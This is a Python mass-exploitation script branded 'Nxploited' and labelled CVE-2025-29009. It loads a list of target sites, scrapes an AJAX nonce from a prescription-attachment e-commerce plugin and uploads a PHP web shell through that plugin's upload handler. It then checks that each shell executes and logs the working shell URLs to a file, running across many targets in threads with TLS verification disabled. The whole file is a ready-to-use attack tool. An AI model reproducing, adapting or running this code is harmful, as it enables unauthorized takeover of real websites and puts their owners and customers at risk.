#Nxploited # GitHub: https://github.com/Nxploited import threading import requests import time import os import re import json import urllib3 import warnings from queue import Queue, Empty from rich.console import Console from rich.text import Text from rich.panel import Panel from rich import box from rich.theme import Theme urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning) os.environ["NO_PROXY"] = "*" theme = Theme({ "banner": "bold bright_cyan", "accent": "bold bright_white", "ok": "bold bright_green", "fail": "bold bright_red", "info": "bright_white", "dim": "dim", "hacker": "bold bright_green", }) console = Console( theme=theme, force_terminal=True, color_system="truecolor", soft_wrap=True ) USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" REQUEST_TIMEOUT = 10 DEFAULT_THREADS = 10 SHELLS_FILE = "shells.txt" shell_local_file = None shell_signature = None target_queue: "Queue[str]" = Queue() state = { "total": 0, "processed": 0, "ok": 0, "fail": 0, } state_lock = threading.Lock() def banner(): lines = [ " ,-. . , ,--. ,-. ,-. ,-. ;--' ,-. ,-. ,-. ,-. ,-. ", "/ | / | ) / /\\ ) | ) ( ) / /\\ / /\\ ( ) ", "| | / |- --- / | / | / `-. --- / `-'| | / | | / | `-'| ", "\\ |/ | / \\/ / / ) / / \\/ / \\/ / / ", " `-' ' `--' '--' `-' '--' `-' '--' `-' `-' `-' `-' ", ] name = "Nxploited" name_len = len(name) txt = Text() for idx, line in enumerate(lines): if idx == 2: mid = len(line) // 2 start = mid - (name_len // 2) if start < 0: start = 0 end = start + name_len left = line[:start] right = line[end:] txt.append(left, style="banner") txt.append(name, style="hacker") txt.append(right + "\n", style="banner") else: txt.append(line + "\n", style="banner") txt.append("\n", style="banner") txt.append("CVE-2025-29009 | File Upload\n", style="ok") console.print(Panel(txt, box=box.SQUARE, border_style="ok")) def ask_config(): global shell_local_file, shell_signature list_file = console.input("[accent]Targets file (default list.txt): [/]").strip() if not list_file: list_file = "list.txt" threads_raw = console.input(f"[accent]Threads (default {DEFAULT_THREADS}): [/]").strip() try: threads = int(threads_raw) if threads_raw else DEFAULT_THREADS except Exception: threads = DEFAULT_THREADS if threads < 1: threads = 1 shell_name = console.input("[accent]Local shell filename (e.g. shell.php): [/]").strip() if not shell_name: shell_name = "shell.php" shell_local_file = shell_name sig = console.input("[accent]Unique shell signature (e.g. NxploitedShellOK): [/]").strip() if not sig: sig = "NxploitedShellOK" shell_signature = sig return list_file, threads def read_targets(path: str): targets = [] try: with open(path, "r", encoding="utf-8", errors="ignore") as f: for line in f: url = line.strip() if not url: continue if not url.lower().startswith(("http://", "https://")): url = "http://" + url targets.append(url.rstrip("/")) except FileNotFoundError: console.print(f"[fail]Targets file not found: {path}[/fail]") raise return targets def save_shell_url(url: str): try: with open(SHELLS_FILE, "a", encoding="utf-8", errors="ignore") as f: f.write(url.strip() + "\n") except Exception: pass def wide_nonce_extract(html: str): patterns = [ r"var\s+wkwcpaFrontObj\s*=\s*(\{.*?\});", r"wkwcpaFrontObj\s*=\s*(\{.*?\});", ] for pat in patterns: m = re.search(pat, html, re.DOTALL) if not m: continue obj_str = m.group(1) try: data = json.loads(obj_str) except Exception: continue ajax = data.get("ajax", {}) ajax_url = ajax.get("ajaxUrl") or ajax.get("ajax_url") ajax_nonce = ajax.get("ajaxNonce") or ajax.get("ajax_nonce") if ajax_url and ajax_nonce: return ajax_url, ajax_nonce m = re.search(r'"ajaxUrl"\s*:\s*"([^"]+)"[^}]*"ajaxNonce"\s*:\s*"([^"]+)"', html) if m: return m.group(1), m.group(2) m = re.search(r'"ajaxNonce"\s*:\s*"([^"]+)"[^}]*"ajaxUrl"\s*:\s*"([^"]+)"', html) if m: return m.group(2), m.group(1) m = re.search(r'wkwcpaFrontObj[^;]*', html) if m: chunk = m.group(0) url_m = re.search(r'["\']ajaxUrl["\']\s*:\s*["\']([^"\']+)["\']', chunk) nonce_m = re.search(r'["\']ajaxNonce["\']\s*:\s*["\']([^"\']+)["\']', chunk) if url_m and nonce_m: return url_m.group(1), nonce_m.group(1) return None, None def resolve_front_page(base: str): candidates = [ base + "/", base + "/shop/", base + "/product/", base + "/?wkwcpa=1", ] for url in candidates: try: resp = requests.get( url, headers={"User-Agent": USER_AGENT}, verify=False, timeout=REQUEST_TIMEOUT, ) if resp.status_code in (200, 302, 301): return url, resp.text except Exception: continue return None, None def get_nonce_and_ajax(base: str): front_url, html = resolve_front_page(base) if not front_url or not html: return None, None, "no_front_page" ajax_url, nonce = wide_nonce_extract(html) if not ajax_url or not nonce: return None, None, "nonce_not_found" return ajax_url, nonce, None def upload_shell(base: str): if not shell_local_file or not os.path.exists(shell_local_file): return False, None, "shell_file_missing" ajax_url, nonce, err = get_nonce_and_ajax(base) if err is not None: return False, None, err files = { "wkwc_pa_prescription_attachment[]": open(shell_local_file, "rb") } data = { "action": "wkwcpa_handle_prescription_session", "nonce": nonce, "type": "upload", } try: resp = requests.post( ajax_url, data=data, files=files, headers={"User-Agent": USER_AGENT}, verify=False, timeout=REQUEST_TIMEOUT, ) except Exception: try: files["wkwc_pa_prescription_attachment[]"].close() except Exception: pass return False, None, "upload_error" try: files["wkwc_pa_prescription_attachment[]"].close() except Exception: pass try: result = resp.json() except Exception: return False, None, "json_parse_error" if not isinstance(result, dict): return False, None, "json_not_dict" data_obj = result.get("data") or {} if not isinstance(data_obj, dict): return False, None, "data_not_dict" if not data_obj.get("success"): return False, None, "success_false" attachments = data_obj.get("attachments_img_html") or [] if not isinstance(attachments, list) or not attachments: return False, None, "no_attachments" html = " ".join(str(x) for x in attachments) name = os.path.basename(shell_local_file) m = re.search(r'src=["\']([^"\']*%s)["\']' % re.escape(name), html) if not m: m = re.search(r'src=["\']([^"\']+)["\']', html) if not m: return False, None, "shell_url_not_found" shell_url = m.group(1) return True, shell_url, None def verify_shell(shell_url: str): try: resp = requests.get( shell_url, headers={"User-Agent": USER_AGENT}, verify=False, timeout=REQUEST_TIMEOUT, ) except Exception: return False if resp.status_code == 200 and shell_signature and shell_signature in resp.text: return True return False def print_status_line(): with state_lock: total = state["total"] processed = state["processed"] ok = state["ok"] fail = state["fail"] msg = Text() msg.append("[", style="dim") msg.append("Status", style="accent") msg.append("] ", style="dim") msg.append(f"{processed}/{total} ", style="info") msg.append("OK:", style="dim") msg.append(f"{ok} ", style="ok") msg.append("FAIL:", style="dim") msg.append(f"{fail}", style="fail") console.print(msg) def worker(): while True: try: target = target_queue.get_nowait() except Empty: return base = target.rstrip("/") try: ok, shell_url, err = upload_shell(base) except Exception: ok, shell_url, err = False, None, "internal_error" if ok and shell_url and verify_shell(shell_url): save_shell_url(shell_url) with state_lock: state["ok"] += 1 console.print(f"[ok]SHELL[/ok] {shell_url}") else: with state_lock: state["fail"] += 1 console.print(f"[fail]FAIL[/fail] {base} ({err})") with state_lock: state["processed"] += 1 target_queue.task_done() def main(): banner() list_file, threads = ask_config() try: targets = read_targets(list_file) except Exception: return if not targets: console.print("[fail]No targets loaded[/fail]") return for t in targets: target_queue.put(t) with state_lock: state["total"] = len(targets) state["processed"] = 0 state["ok"] = 0 state["fail"] = 0 threads_list = [] for _ in range(min(threads, len(targets) or 1)): th = threading.Thread(target=worker, daemon=True) th.start() threads_list.append(th) last_processed = -1 while True: with state_lock: processed = state["processed"] total = state["total"] if processed != last_processed: print_status_line() last_processed = processed if processed >= total: break time.sleep(0.5) target_queue.join() for th in threads_list: th.join(timeout=0.1) console.print() print_status_line() console.print(Panel(Text(f"Shell URLs saved to {SHELLS_FILE}", style="ok"), border_style="ok", box=box.ROUNDED)) if __name__ == "__main__": main()